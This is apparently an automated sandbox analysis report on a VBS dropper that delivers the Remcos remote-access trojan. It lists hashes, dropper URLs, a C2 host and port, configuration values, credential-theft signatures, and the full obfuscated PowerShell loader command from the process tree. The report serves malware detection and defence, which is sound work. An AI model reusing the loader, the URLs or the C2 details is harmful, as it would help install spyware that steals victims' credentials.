Analysis
-
max time kernel
150s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
23/08/2024, 11:04
General
-
Target
sweetchcobarmilkbunwithgreatsweet.vbs
-
Size
184KB
-
MD5
09c311fde82907d15d6c211cba5102fe
-
SHA1
878ac6d6e1161babad2a8cf5fcec2361ff4936dd
-
SHA256
5e8cf043fa42fd8892c72fbdbf02c1023b1379322be23c213cfba5b8ae196f33
-
SHA512
758ed3c2cf758604e34ca0fe6c96f396e76728893377e983a07eca19838634954a0c70216e7416107e45404c9340498689d1363b08f4c2ac12c668dfb04185d5
-
SSDEEP
3072:DEx+vVuJ/1T6BxNyYI1gt5pXGw6IzS71lUOceP9LVGbGu:A4tuR1Tax/IPUde9RMB
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
exe.dropper
https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
Extracted
Family
remcos
Botnet
zynova
C2
jramcos.duckdns.org:14645
Attributes
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-I5MYYN
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
-
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
-
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
-
Suspicious behavior: MapViewOfSection 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 34 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sweetchcobarmilkbunwithgreatsweet.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J㉯ ⫏ ㇀ 〷 ⇍Bp㉯ ⫏ ㇀ 〷 ⇍G0㉯ ⫏ ㇀ 〷 ⇍YQBn㉯ ⫏ ㇀ 〷 ⇍GU㉯ ⫏ ㇀ 〷 ⇍VQBy㉯ ⫏ ㇀ 〷 ⇍Gw㉯ ⫏ ㇀ 〷 ⇍I㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍9㉯ ⫏ ㇀ 〷 ⇍C㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍JwBo㉯ ⫏ ㇀ 〷 ⇍HQ㉯ ⫏ ㇀ 〷 ⇍d㉯ ⫏ ㇀ 〷 ⇍Bw㉯ ⫏ ㇀ 〷 ⇍HM㉯ ⫏ ㇀ 〷 ⇍Og㉯ ⫏ ㇀ 〷 ⇍v㉯ ⫏ ㇀ 〷 ⇍C8㉯ ⫏ ㇀ 〷 ⇍aQBh㉯ ⫏ ㇀ 〷 ⇍Dg㉯ ⫏ ㇀ 〷 ⇍M㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍z㉯ ⫏ ㇀ 〷 ⇍DE㉯ ⫏ ㇀ 〷 ⇍M㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍0㉯ ⫏ ㇀ 〷 ⇍C4㉯ ⫏ ㇀ 〷 ⇍dQBz㉯ ⫏ ㇀ 〷 ⇍C4㉯ ⫏ ㇀ 〷 ⇍YQBy㉯ ⫏ ㇀ 〷 ⇍GM㉯ ⫏ ㇀ 〷 ⇍a㉯ ⫏ ㇀ 〷 ⇍Bp㉯ ⫏ ㇀ 〷 ⇍HY㉯ ⫏ ㇀ 〷 ⇍ZQ㉯ ⫏ ㇀ 〷 ⇍u㉯ ⫏ ㇀ 〷 ⇍G8㉯ ⫏ ㇀ 〷 ⇍cgBn㉯ ⫏ ㇀ 〷 ⇍C8㉯ ⫏ ㇀ 〷 ⇍Mg㉯ ⫏ ㇀ 〷 ⇍3㉯ ⫏ ㇀ 〷 ⇍C8㉯ ⫏ ㇀ 〷 ⇍aQB0㉯ ⫏ ㇀ 〷 ⇍GU㉯ ⫏ ㇀ 〷 ⇍bQBz㉯ ⫏ ㇀ 〷 ⇍C8㉯ ⫏ ㇀ 〷 ⇍dgBi㉯ ⫏ ㇀ 〷 ⇍HM㉯ ⫏ ㇀ 〷 ⇍Xw㉯ ⫏ ㇀ 〷 ⇍y㉯ ⫏ ㇀ 〷 ⇍D㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍Mg㉯ ⫏ ㇀ 〷 ⇍0㉯ ⫏ ㇀ 〷 ⇍D㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍Nw㉯ ⫏ ㇀ 〷 ⇍y㉯ ⫏ ㇀ 〷 ⇍DY㉯ ⫏ ㇀ 〷 ⇍Xw㉯ ⫏ ㇀ 〷 ⇍y㉯ ⫏ ㇀ 〷 ⇍D㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍Mg㉯ ⫏ ㇀ 〷 ⇍0㉯ ⫏ ㇀ 〷 ⇍D㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍Nw㉯ ⫏ ㇀ 〷 ⇍y㉯ ⫏ ㇀ 〷 ⇍DY㉯ ⫏ ㇀ 〷 ⇍LwB2㉯ ⫏ ㇀ 〷 ⇍GI㉯ ⫏ ㇀ 〷 ⇍cw㉯ ⫏ ㇀ 〷 ⇍u㉯ ⫏ ㇀ 〷 ⇍Go㉯ ⫏ ㇀ 〷 ⇍c㉯ ⫏ ㇀ 〷 ⇍Bn㉯ ⫏ ㇀ 〷 ⇍Cc㉯ ⫏ ㇀ 〷 ⇍Ow㉯ ⫏ ㇀ 〷 ⇍k㉯ ⫏ ㇀ 〷 ⇍Hc㉯ ⫏ ㇀ 〷 ⇍ZQBi㉯ ⫏ ㇀ 〷 ⇍EM㉯ ⫏ ㇀ 〷 ⇍b㉯ ⫏ ㇀ 〷 ⇍Bp㉯ ⫏ ㇀ 〷 ⇍GU㉯ ⫏ ㇀ 〷 ⇍bgB0㉯ ⫏ ㇀ 〷 ⇍C㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍PQ㉯ ⫏ ㇀ 〷 ⇍g㉯ ⫏ ㇀ 〷 ⇍E4㉯ ⫏ ㇀ 〷 ⇍ZQB3㉯ ⫏ ㇀ 〷 ⇍C0㉯ ⫏ ㇀ 〷 ⇍TwBi㉯ ⫏ ㇀ 〷 ⇍Go㉯ ⫏ ㇀ 〷 ⇍ZQBj㉯ ⫏ ㇀ 〷 ⇍HQ㉯ ⫏ ㇀ 〷 ⇍I㉯ ⫏ ㇀ 〷 ⇍BT㉯ ⫏ ㇀ 〷 ⇍Hk㉯ ⫏ ㇀ 〷 ⇍cwB0㉯ ⫏ ㇀ 〷 ⇍GU㉯ ⫏ ㇀ 〷 ⇍bQ㉯ ⫏ ㇀ 〷 ⇍u㉯ ⫏ ㇀ 〷 ⇍E4㉯ ⫏ ㇀ 〷 ⇍ZQB0㉯ ⫏ ㇀ 〷 ⇍C4㉯ ⫏ ㇀ 〷 ⇍VwBl㉯ ⫏ ㇀ 〷 ⇍GI㉯ ⫏ ㇀ 〷 ⇍QwBs㉯ ⫏ ㇀ 〷 ⇍Gk㉯ ⫏ ㇀ 〷 ⇍ZQBu㉯ ⫏ ㇀ 〷 ⇍HQ㉯ ⫏ ㇀ 〷 ⇍Ow㉯ ⫏ ㇀ 〷 ⇍k㉯ ⫏ ㇀ 〷 ⇍Gk㉯ ⫏ ㇀ 〷 ⇍bQBh㉯ ⫏ ㇀ 〷 ⇍Gc㉯ ⫏ ㇀ 〷 ⇍ZQBC㉯ ⫏ ㇀ 〷 ⇍Hk㉯ ⫏ ㇀ 〷 ⇍d㉯ ⫏ ㇀ 〷 ⇍Bl㉯ ⫏ ㇀ 〷 ⇍HM㉯ ⫏ ㇀ 〷 ⇍I㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍9㉯ ⫏ ㇀ 〷 ⇍C㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍J㉯ ⫏ ㇀ 〷 ⇍B3㉯ ⫏ ㇀ 〷 ⇍GU㉯ ⫏ ㇀ 〷 ⇍YgBD㉯ ⫏ ㇀ 〷 ⇍Gw㉯ ⫏ ㇀ 〷 ⇍aQBl㉯ ⫏ ㇀ 〷 ⇍G4㉯ ⫏ ㇀ 〷 ⇍d㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍u㉯ ⫏ ㇀ 〷 ⇍EQ㉯ ⫏ ㇀ 〷 ⇍bwB3㉯ ⫏ ㇀ 〷 ⇍G4㉯ ⫏ ㇀ 〷 ⇍b㉯ ⫏ ㇀ 〷 ⇍Bv㉯ ⫏ ㇀ 〷 ⇍GE㉯ ⫏ ㇀ 〷 ⇍Z㉯ ⫏ ㇀ 〷 ⇍BE㉯ ⫏ ㇀ 〷 ⇍GE㉯ ⫏ ㇀ 〷 ⇍d㉯ ⫏ ㇀ 〷 ⇍Bh㉯ ⫏ ㇀ 〷 ⇍Cg㉯ ⫏ ㇀ 〷 ⇍J㉯ ⫏ ㇀ 〷 ⇍Bp㉯ ⫏ ㇀ 〷 ⇍G0㉯ ⫏ ㇀ 〷 ⇍YQBn㉯ ⫏ ㇀ 〷 ⇍GU㉯ ⫏ ㇀ 〷 ⇍VQBy㉯ ⫏ ㇀ 〷 ⇍Gw㉯ ⫏ ㇀ 〷 ⇍KQ㉯ ⫏ ㇀ 〷 ⇍7㉯ ⫏ ㇀ 〷 ⇍CQ㉯ ⫏ ㇀ 〷 ⇍aQBt㉯ ⫏ ㇀ 〷 ⇍GE㉯ ⫏ ㇀ 〷 ⇍ZwBl㉯ ⫏ ㇀ 〷 ⇍FQ㉯ ⫏ ㇀ 〷 ⇍ZQB4㉯ ⫏ ㇀ 〷 ⇍HQ㉯ ⫏ ㇀ 〷 ⇍I㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍9㉯ ⫏ ㇀ 〷 ⇍C㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍WwBT㉯ ⫏ ㇀ 〷 ⇍Hk㉯ ⫏ ㇀ 〷 ⇍cwB0㉯ ⫏ ㇀ 〷 ⇍GU㉯ ⫏ ㇀ 〷 ⇍bQ㉯ ⫏ ㇀ 〷 ⇍u㉯ ⫏ ㇀ 〷 ⇍FQ㉯ ⫏ ㇀ 〷 ⇍ZQB4㉯ ⫏ ㇀ 〷 ⇍HQ㉯ ⫏ ㇀ 〷 ⇍LgBF㉯ ⫏ ㇀ 〷 ⇍G4㉯ ⫏ ㇀ 〷 ⇍YwBv㉯ ⫏ ㇀ 〷 ⇍GQ㉯ ⫏ ㇀ 〷 ⇍aQBu㉯ ⫏ ㇀ 〷 ⇍Gc㉯ ⫏ ㇀ 〷 ⇍XQ㉯ ⫏ ㇀ 〷 ⇍6㉯ ⫏ ㇀ 〷 ⇍Do㉯ ⫏ ㇀ 〷 ⇍VQBU㉯ ⫏ ㇀ 〷 ⇍EY㉯ ⫏ ㇀ 〷 ⇍O㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍u㉯ ⫏ ㇀ 〷 ⇍Ec㉯ ⫏ ㇀ 〷 ⇍ZQB0㉯ ⫏ ㇀ 〷 ⇍FM㉯ ⫏ ㇀ 〷 ⇍d㉯ ⫏ ㇀ 〷 ⇍By㉯ ⫏ ㇀ 〷 ⇍Gk㉯ ⫏ ㇀ 〷 ⇍bgBn㉯ ⫏ ㇀ 〷 ⇍Cg㉯ ⫏ ㇀ 〷 ⇍J㉯ ⫏ ㇀ 〷 ⇍Bp㉯ ⫏ ㇀ 〷 ⇍G0㉯ ⫏ ㇀ 〷 ⇍YQBn㉯ ⫏ ㇀ 〷 ⇍GU㉯ ⫏ ㇀ 〷 ⇍QgB5㉯ ⫏ ㇀ 〷 ⇍HQ㉯ ⫏ ㇀ 〷 ⇍ZQBz㉯ ⫏ ㇀ 〷 ⇍Ck㉯ ⫏ ㇀ 〷 ⇍Ow㉯ ⫏ ㇀ 〷 ⇍k㉯ ⫏ ㇀ 〷 ⇍HM㉯ ⫏ ㇀ 〷 ⇍d㉯ ⫏ ㇀ 〷 ⇍Bh㉯ ⫏ ㇀ 〷 ⇍HI㉯ ⫏ ㇀ 〷 ⇍d㉯ ⫏ ㇀ 〷 ⇍BG㉯ ⫏ ㇀ 〷 ⇍Gw㉯ ⫏ ㇀ 〷 ⇍YQBn㉯ ⫏ ㇀ 〷 ⇍C㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍PQ㉯ ⫏ ㇀ 〷 ⇍g㉯ ⫏ ㇀ 〷 ⇍Cc㉯ ⫏ ㇀ 〷 ⇍P㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍8㉯ ⫏ ㇀ 〷 ⇍EI㉯ ⫏ ㇀ 〷 ⇍QQBT㉯ ⫏ ㇀ 〷 ⇍EU㉯ ⫏ ㇀ 〷 ⇍Ng㉯ ⫏ ㇀ 〷 ⇍0㉯ ⫏ ㇀ 〷 ⇍F8㉯ ⫏ ㇀ 〷 ⇍UwBU㉯ ⫏ ㇀ 〷 ⇍EE㉯ ⫏ ㇀ 〷 ⇍UgBU㉯ ⫏ ㇀ 〷 ⇍D4㉯ ⫏ ㇀ 〷 ⇍Pg㉯ ⫏ ㇀ 〷 ⇍n㉯ ⫏ ㇀ 〷 ⇍Ds㉯ ⫏ ㇀ 〷 ⇍J㉯ ⫏ ㇀ 〷 ⇍Bl㉯ ⫏ ㇀ 〷 ⇍G4㉯ ⫏ ㇀ 〷 ⇍Z㉯ ⫏ ㇀ 〷 ⇍BG㉯ ⫏ ㇀ 〷 ⇍Gw㉯ ⫏ ㇀ 〷 ⇍YQBn㉯ ⫏ ㇀ 〷 ⇍C㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍PQ㉯ ⫏ ㇀ 〷 ⇍g㉯ ⫏ ㇀ 〷 ⇍Cc㉯ ⫏ ㇀ 〷 ⇍P㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍8㉯ ⫏ ㇀ 〷 ⇍EI㉯ ⫏ ㇀ 〷 ⇍QQBT㉯ ⫏ ㇀ 〷 ⇍EU㉯ ⫏ ㇀ 〷 ⇍Ng㉯ ⫏ ㇀ 〷 ⇍0㉯ ⫏ ㇀ 〷 ⇍F8㉯ ⫏ ㇀ 〷 ⇍RQBO㉯ ⫏ ㇀ 〷 ⇍EQ㉯ ⫏ ㇀ 〷 ⇍Pg㉯ ⫏ ㇀ 〷 ⇍+㉯ ⫏ ㇀ 〷 ⇍Cc㉯ ⫏ ㇀ 〷 ⇍Ow㉯ ⫏ ㇀ 〷 ⇍k㉯ ⫏ ㇀ 〷 ⇍HM㉯ ⫏ ㇀ 〷 ⇍d㉯ ⫏ ㇀ 〷 ⇍Bh㉯ ⫏ ㇀ 〷 ⇍HI㉯ ⫏ ㇀ 〷 ⇍d㉯ ⫏ ㇀ 〷 ⇍BJ㉯ ⫏ ㇀ 〷 ⇍G4㉯ ⫏ ㇀ 〷 ⇍Z㉯ ⫏ ㇀ 〷 ⇍Bl㉯ ⫏ ㇀ 〷 ⇍Hg㉯ ⫏ ㇀ 〷 ⇍I㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍9㉯ ⫏ ㇀ 〷 ⇍C㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍J㉯ ⫏ ㇀ 〷 ⇍Bp㉯ ⫏ ㇀ 〷 ⇍G0㉯ ⫏ ㇀ 〷 ⇍YQBn㉯ ⫏ ㇀ 〷 ⇍GU㉯ ⫏ ㇀ 〷 ⇍V㉯ ⫏ ㇀ 〷 ⇍Bl㉯ ⫏ ㇀ 〷 ⇍Hg㉯ ⫏ ㇀ 〷 ⇍d㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍u㉯ ⫏ ㇀ 〷 ⇍Ek㉯ ⫏ ㇀ 〷 ⇍bgBk㉯ ⫏ ㇀ 〷 ⇍GU㉯ ⫏ ㇀ 〷 ⇍e㉯ ⫏ ㇀ 〷 ⇍BP㉯ ⫏ ㇀ 〷 ⇍GY㉯ ⫏ ㇀ 〷 ⇍K㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍k㉯ ⫏ ㇀ 〷 ⇍HM㉯ ⫏ ㇀ 〷 ⇍d㉯ ⫏ ㇀ 〷 ⇍Bh㉯ ⫏ ㇀ 〷 ⇍HI㉯ ⫏ ㇀ 〷 ⇍d㉯ ⫏ ㇀ 〷 ⇍BG㉯ ⫏ ㇀ 〷 ⇍Gw㉯ ⫏ ㇀ 〷 ⇍YQBn㉯ ⫏ ㇀ 〷 ⇍Ck㉯ ⫏ ㇀ 〷 ⇍Ow㉯ ⫏ ㇀ 〷 ⇍k㉯ ⫏ ㇀ 〷 ⇍GU㉯ ⫏ ㇀ 〷 ⇍bgBk㉯ ⫏ ㇀ 〷 ⇍Ek㉯ ⫏ ㇀ 〷 ⇍bgBk㉯ ⫏ ㇀ 〷 ⇍GU㉯ ⫏ ㇀ 〷 ⇍e㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍g㉯ ⫏ ㇀ 〷 ⇍D0㉯ ⫏ ㇀ 〷 ⇍I㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍k㉯ ⫏ ㇀ 〷 ⇍Gk㉯ ⫏ ㇀ 〷 ⇍bQBh㉯ ⫏ ㇀ 〷 ⇍Gc㉯ ⫏ ㇀ 〷 ⇍ZQBU㉯ ⫏ ㇀ 〷 ⇍GU㉯ ⫏ ㇀ 〷 ⇍e㉯ ⫏ ㇀ 〷 ⇍B0㉯ ⫏ ㇀ 〷 ⇍C4㉯ ⫏ ㇀ 〷 ⇍SQBu㉯ ⫏ ㇀ 〷 ⇍GQ㉯ ⫏ ㇀ 〷 ⇍ZQB4㉯ ⫏ ㇀ 〷 ⇍E8㉯ ⫏ ㇀ 〷 ⇍Zg㉯ ⫏ ㇀ 〷 ⇍o㉯ ⫏ ㇀ 〷 ⇍CQ㉯ ⫏ ㇀ 〷 ⇍ZQBu㉯ ⫏ ㇀ 〷 ⇍GQ㉯ ⫏ ㇀ 〷 ⇍RgBs㉯ ⫏ ㇀ 〷 ⇍GE㉯ ⫏ ㇀ 〷 ⇍Zw㉯ ⫏ ㇀ 〷 ⇍p㉯ ⫏ ㇀ 〷 ⇍Ds㉯ ⫏ ㇀ 〷 ⇍J㉯ ⫏ ㇀ 〷 ⇍Bz㉯ ⫏ ㇀ 〷 ⇍HQ㉯ ⫏ ㇀ 〷 ⇍YQBy㉯ ⫏ ㇀ 〷 ⇍HQ㉯ ⫏ ㇀ 〷 ⇍SQBu㉯ ⫏ ㇀ 〷 ⇍GQ㉯ ⫏ ㇀ 〷 ⇍ZQB4㉯ ⫏ ㇀ 〷 ⇍C㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍LQBn㉯ ⫏ ㇀ 〷 ⇍GU㉯ ⫏ ㇀ 〷 ⇍I㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍w㉯ ⫏ ㇀ 〷 ⇍C㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍LQBh㉯ ⫏ ㇀ 〷 ⇍G4㉯ ⫏ ㇀ 〷 ⇍Z㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍g㉯ ⫏ ㇀ 〷 ⇍CQ㉯ ⫏ ㇀ 〷 ⇍ZQBu㉯ ⫏ ㇀ 〷 ⇍GQ㉯ ⫏ ㇀ 〷 ⇍SQBu㉯ ⫏ ㇀ 〷 ⇍GQ㉯ ⫏ ㇀ 〷 ⇍ZQB4㉯ ⫏ ㇀ 〷 ⇍C㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍LQBn㉯ ⫏ ㇀ 〷 ⇍HQ㉯ ⫏ ㇀ 〷 ⇍I㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍k㉯ ⫏ ㇀ 〷 ⇍HM㉯ ⫏ ㇀ 〷 ⇍d㉯ ⫏ ㇀ 〷 ⇍Bh㉯ ⫏ ㇀ 〷 ⇍HI㉯ ⫏ ㇀ 〷 ⇍d㉯ ⫏ ㇀ 〷 ⇍BJ㉯ ⫏ ㇀ 〷 ⇍G4㉯ ⫏ ㇀ 〷 ⇍Z㉯ ⫏ ㇀ 〷 ⇍Bl㉯ ⫏ ㇀ 〷 ⇍Hg㉯ ⫏ ㇀ 〷 ⇍Ow㉯ ⫏ ㇀ 〷 ⇍k㉯ ⫏ ㇀ 〷 ⇍HM㉯ ⫏ ㇀ 〷 ⇍d㉯ ⫏ ㇀ 〷 ⇍Bh㉯ ⫏ ㇀ 〷 ⇍HI㉯ ⫏ ㇀ 〷 ⇍d㉯ ⫏ ㇀ 〷 ⇍BJ㉯ ⫏ ㇀ 〷 ⇍G4㉯ ⫏ ㇀ 〷 ⇍Z㉯ ⫏ ㇀ 〷 ⇍Bl㉯ ⫏ ㇀ 〷 ⇍Hg㉯ ⫏ ㇀ 〷 ⇍I㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍r㉯ ⫏ ㇀ 〷 ⇍D0㉯ ⫏ ㇀ 〷 ⇍I㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍k㉯ ⫏ ㇀ 〷 ⇍HM㉯ ⫏ ㇀ 〷 ⇍d㉯ ⫏ ㇀ 〷 ⇍Bh㉯ ⫏ ㇀ 〷 ⇍HI㉯ ⫏ ㇀ 〷 ⇍d㉯ ⫏ ㇀ 〷 ⇍BG㉯ ⫏ ㇀ 〷 ⇍Gw㉯ ⫏ ㇀ 〷 ⇍YQBn㉯ ⫏ ㇀ 〷 ⇍C4㉯ ⫏ ㇀ 〷 ⇍T㉯ ⫏ ㇀ 〷 ⇍Bl㉯ ⫏ ㇀ 〷 ⇍G4㉯ ⫏ ㇀ 〷 ⇍ZwB0㉯ ⫏ ㇀ 〷 ⇍Gg㉯ ⫏ ㇀ 〷 ⇍Ow㉯ ⫏ ㇀ 〷 ⇍k㉯ ⫏ ㇀ 〷 ⇍GI㉯ ⫏ ㇀ 〷 ⇍YQBz㉯ ⫏ ㇀ 〷 ⇍GU㉯ ⫏ ㇀ 〷 ⇍Ng㉯ ⫏ ㇀ 〷 ⇍0㉯ ⫏ ㇀ 〷 ⇍Ew㉯ ⫏ ㇀ 〷 ⇍ZQBu㉯ ⫏ ㇀ 〷 ⇍Gc㉯ ⫏ ㇀ 〷 ⇍d㉯ ⫏ ㇀ 〷 ⇍Bo㉯ ⫏ ㇀ 〷 ⇍C㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍PQ㉯ ⫏ ㇀ 〷 ⇍g㉯ ⫏ ㇀ 〷 ⇍CQ㉯ ⫏ ㇀ 〷 ⇍ZQBu㉯ ⫏ ㇀ 〷 ⇍GQ㉯ ⫏ ㇀ 〷 ⇍SQBu㉯ ⫏ ㇀ 〷 ⇍GQ㉯ ⫏ ㇀ 〷 ⇍ZQB4㉯ ⫏ ㇀ 〷 ⇍C㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍LQ㉯ ⫏ ㇀ 〷 ⇍g㉯ ⫏ ㇀ 〷 ⇍CQ㉯ ⫏ ㇀ 〷 ⇍cwB0㉯ ⫏ ㇀ 〷 ⇍GE㉯ ⫏ ㇀ 〷 ⇍cgB0㉯ ⫏ ㇀ 〷 ⇍Ek㉯ ⫏ ㇀ 〷 ⇍bgBk㉯ ⫏ ㇀ 〷 ⇍GU㉯ ⫏ ㇀ 〷 ⇍e㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍7㉯ ⫏ ㇀ 〷 ⇍CQ㉯ ⫏ ㇀ 〷 ⇍YgBh㉯ ⫏ ㇀ 〷 ⇍HM㉯ ⫏ ㇀ 〷 ⇍ZQ㉯ ⫏ ㇀ 〷 ⇍2㉯ ⫏ ㇀ 〷 ⇍DQ㉯ ⫏ ㇀ 〷 ⇍QwBv㉯ ⫏ ㇀ 〷 ⇍G0㉯ ⫏ ㇀ 〷 ⇍bQBh㉯ ⫏ ㇀ 〷 ⇍G4㉯ ⫏ ㇀ 〷 ⇍Z㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍g㉯ ⫏ ㇀ 〷 ⇍D0㉯ ⫏ ㇀ 〷 ⇍I㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍k㉯ ⫏ ㇀ 〷 ⇍Gk㉯ ⫏ ㇀ 〷 ⇍bQBh㉯ ⫏ ㇀ 〷 ⇍Gc㉯ ⫏ ㇀ 〷 ⇍ZQBU㉯ ⫏ ㇀ 〷 ⇍GU㉯ ⫏ ㇀ 〷 ⇍e㉯ ⫏ ㇀ 〷 ⇍B0㉯ ⫏ ㇀ 〷 ⇍C4㉯ ⫏ ㇀ 〷 ⇍UwB1㉯ ⫏ ㇀ 〷 ⇍GI㉯ ⫏ ㇀ 〷 ⇍cwB0㉯ ⫏ ㇀ 〷 ⇍HI㉯ ⫏ ㇀ 〷 ⇍aQBu㉯ ⫏ ㇀ 〷 ⇍Gc㉯ ⫏ ㇀ 〷 ⇍K㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍k㉯ ⫏ ㇀ 〷 ⇍HM㉯ ⫏ ㇀ 〷 ⇍d㉯ ⫏ ㇀ 〷 ⇍Bh㉯ ⫏ ㇀ 〷 ⇍HI㉯ ⫏ ㇀ 〷 ⇍d㉯ ⫏ ㇀ 〷 ⇍BJ㉯ ⫏ ㇀ 〷 ⇍G4㉯ ⫏ ㇀ 〷 ⇍Z㉯ ⫏ ㇀ 〷 ⇍Bl㉯ ⫏ ㇀ 〷 ⇍Hg㉯ ⫏ ㇀ 〷 ⇍L㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍g㉯ ⫏ ㇀ 〷 ⇍CQ㉯ ⫏ ㇀ 〷 ⇍YgBh㉯ ⫏ ㇀ 〷 ⇍HM㉯ ⫏ ㇀ 〷 ⇍ZQ㉯ ⫏ ㇀ 〷 ⇍2㉯ ⫏ ㇀ 〷 ⇍DQ㉯ ⫏ ㇀ 〷 ⇍T㉯ ⫏ ㇀ 〷 ⇍Bl㉯ ⫏ ㇀ 〷 ⇍G4㉯ ⫏ ㇀ 〷 ⇍ZwB0㉯ ⫏ ㇀ 〷 ⇍Gg㉯ ⫏ ㇀ 〷 ⇍KQ㉯ ⫏ ㇀ 〷 ⇍7㉯ ⫏ ㇀ 〷 ⇍CQ㉯ ⫏ ㇀ 〷 ⇍YwBv㉯ ⫏ ㇀ 〷 ⇍G0㉯ ⫏ ㇀ 〷 ⇍bQBh㉯ ⫏ ㇀ 〷 ⇍G4㉯ ⫏ ㇀ 〷 ⇍Z㉯ ⫏ ㇀ 〷 ⇍BC㉯ ⫏ ㇀ 〷 ⇍Hk㉯ ⫏ ㇀ 〷 ⇍d㉯ ⫏ ㇀ 〷 ⇍Bl㉯ ⫏ ㇀ 〷 ⇍HM㉯ ⫏ ㇀ 〷 ⇍I㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍9㉯ ⫏ ㇀ 〷 ⇍C㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍WwBT㉯ ⫏ ㇀ 〷 ⇍Hk㉯ ⫏ ㇀ 〷 ⇍cwB0㉯ ⫏ ㇀ 〷 ⇍GU㉯ ⫏ ㇀ 〷 ⇍bQ㉯ ⫏ ㇀ 〷 ⇍u㉯ 